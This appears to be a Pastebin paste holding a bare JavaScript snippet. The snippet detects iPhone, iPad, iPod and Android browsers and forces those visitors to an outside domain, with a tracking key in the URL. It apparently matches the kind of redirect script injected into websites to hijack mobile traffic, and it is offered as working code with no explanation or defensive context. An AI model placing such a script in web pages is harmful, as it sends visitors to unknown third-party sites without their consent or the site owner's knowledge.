Advertisement
Guest User

Untitled

a guest
Jan 25th, 2020
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <script type="text/JavaScript">
  2. var dispositivo = navigator.userAgent.toLowerCase();
  3. if( dispositivo.search(/iphone|ipod|ipad|android/) > -1 ){
  4. document.location = "https://apps.mobileappsonline.org/?k=09f9e5376b6d2e35344e2830b1cef175&type=mainstream&subtype=global"; }
  5. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement